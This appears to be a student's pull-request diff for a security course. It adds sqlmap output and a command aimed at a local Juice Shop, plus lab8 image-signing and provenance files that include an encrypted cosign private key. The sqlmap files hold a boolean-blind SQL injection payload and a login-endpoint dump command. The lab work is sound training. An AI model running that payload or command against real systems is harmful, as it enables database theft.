Feature/lab8

.github/pull_request_template.md

@@ -0,0 +1,9 @@
+# Goal 
+Submitting my homework for lab#
+
+# Changes
+- Added submissionXX.md
+
+# Checklist
+- [x] Task 1 done
+- [x] Task 2 done

labs/lab5/sqlmap/localhost/log

@@ -0,0 +1,8 @@
+sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
+---
+Parameter: #1* (URI)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: http://localhost:3000/rest/products/search?q=') AND 6254=6254 AND ('jcto' LIKE 'jcto
+---
+back-end DBMS: SQLite

labs/lab5/sqlmap/localhost/target.txt

@@ -0,0 +1,3 @@
+http://localhost:3000/rest/user/login (POST)  # /sqlmap/sqlmap.py -u http://localhost:3000/rest/user/login --data {\"email\":\"*\",\"password\":\"test\"} --method POST "--headers=Content-Type: application/json" --dbms=sqlite --batch --level=5 --risk=3 --technique=BT --threads=5 --output-dir=/output --dump
+
+{"email":"*","password":"test"}

labs/lab8/analysis/ref-after-tamper.txt

@@ -0,0 +1 @@
+After tamper digest ref: localhost:5000/juice-shop@sha256:b8d1827e38a1d49cd17217efd7b07d689e4ea1744e39c7dcbb95533d175bea65

labs/lab8/analysis/ref.txt

@@ -0,0 +1 @@
+Using digest ref: localhost:5000/juice-shop@sha256:547bd3fef4a6d7e25e131da68f454e6dc4a59d281f8793df6853e6796c9bbf58

labs/lab8/attest/provenance.json

@@ -0,0 +1,7 @@
+{
+  "_type": "https://slsa.dev/provenance/v1",
+  "buildType": "manual-local-demo",
+  "builder": {"id": "student@local"},
+  "invocation": {"parameters": {"image": "localhost:5000/juice-shop@"}},
+  "metadata": {"buildStartedOn": "2026-05-12T19:40:43Z", "completeness": {"parameters": true}}
+}

labs/lab8/attest/verify-provenance.txt

@@ -0,0 +1 @@
+{"payload":"eyJfdHlwZSI6Imh0dHBzOi8vaW4tdG90by5pby9TdGF0ZW1lbnQvdjAuMSIsICJzdWJqZWN0IjpbeyJuYW1lIjoibG9jYWxob3N0OjUwMDAvanVpY2Utc2hvcCIsICJkaWdlc3QiOnsic2hhMjU2IjoiNTQ3YmQzZmVmNGE2ZDdlMjVlMTMxZGE2OGY0NTRlNmRjNGE1OWQyODFmODc5M2RmNjg1M2U2Nzk2YzliYmY1OCJ9fV0sICJwcmVkaWNhdGVUeXBlIjoiaHR0cHM6Ly9zbHNhLmRldi9wcm92ZW5hbmNlL3YwLjIiLCAicHJlZGljYXRlIjp7ImJ1aWxkVHlwZSI6Im1hbnVhbC1sb2NhbC1kZW1vIiwgImJ1aWxkZXIiOnsiaWQiOiJzdHVkZW50QGxvY2FsIn0sICJpbnZvY2F0aW9uIjp7InBhcmFtZXRlcnMiOnsiaW1hZ2UiOiJsb2NhbGhvc3Q6NTAwMC9qdWljZS1zaG9wQCJ9fSwgIm1ldGFkYXRhIjp7ImJ1aWxkU3RhcnRlZE9uIjoiMjAyNi0wNS0xMlQxOTowMDowMFoiLCAiY29tcGxldGVuZXNzIjp7InBhcmFtZXRlcnMiOnRydWV9fX19","payloadType":"application/vnd.in-toto+json","signatures":[{"sig":"MEQCIAEWPqVYMqMUdl737zN68ahpOMohiMuZFCT++bsKLKL/AiAtTSUSWP2lvq+XL58spVGWm7Z5q+z/5wqW80n+ZtSYbQ=="}]}

labs/lab8/signing/cosign.key

@@ -0,0 +1,11 @@
+-----BEGIN ENCRYPTED SIGSTORE PRIVATE KEY-----
+eyJrZGYiOnsibmFtZSI6InNjcnlwdCIsInBhcmFtcyI6eyJOIjo2NTUzNiwiciI6
+OCwicCI6MX0sInNhbHQiOiIzR2xZcjVaZWVTcEY0bVY0RTkrbXdUdUlyZ0d0Z3hL
+bTBLSHlBSTJlRlRBPSJ9LCJjaXBoZXIiOnsibmFtZSI6Im5hY2wvc2VjcmV0Ym94
+Iiwibm9uY2UiOiJQS3BEY2Vnbm5FVVh2cFYyb0RUbFBvTHdCT0JGTWZZdCJ9LCJj
+aXBoZXJ0ZXh0IjoiVUJuYld3ajN2THNNOUtaSnNjS044dTBUaVpHVk15amQ1SjZx
+aUpLOWI3ZnlUcVMrcytuR2Eyd1hNd0pJUCsyRDQ5azVXeDljTmZDWG80RmlqNTQ0
+bkMvcGxlZFplODdNTTlWN2psMHFvbzVLUzBMdGJDRVFtRWduOHRYWXB3VUtHMmxV
+Q0tYc2xnOHlocG5wYlhFdzRuOTFyRmQ0bHRxMC9PWExPT3lIbzlnQnlUNFo1T2xG
+UGNyOXZ1Vld4UzlCd2d3dXA3VWMvWFVtT1E9PSJ9
+-----END ENCRYPTED SIGSTORE PRIVATE KEY-----

labs/lab8/signing/cosign.pub

@@ -0,0 +1,4 @@
+-----BEGIN PUBLIC KEY-----
+MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElheoXeGJ1N/yRTOrpxBYxukpYGVm
+paDZwHigDDHKe+PuHeEqk2ZZwPZY8vXEhu9bMKj2WaNAlDNojrc+AQoCZQ==
+-----END PUBLIC KEY-----

labs/lab8/signing/no-tlog-signing-config.json

@@ -0,0 +1 @@
+{"mediaType":"application/vnd.dev.sigstore.signingconfig.v0.2+json", "rekorTlogConfig":{}, "tsaConfig":{}}

labs/submission8.md

@@ -0,0 +1,2 @@
+# Task 1
+Signing prevents tag tampering in already set up workflows, just like commit signing in git. Subject digest is basically a hash, that relies on the tag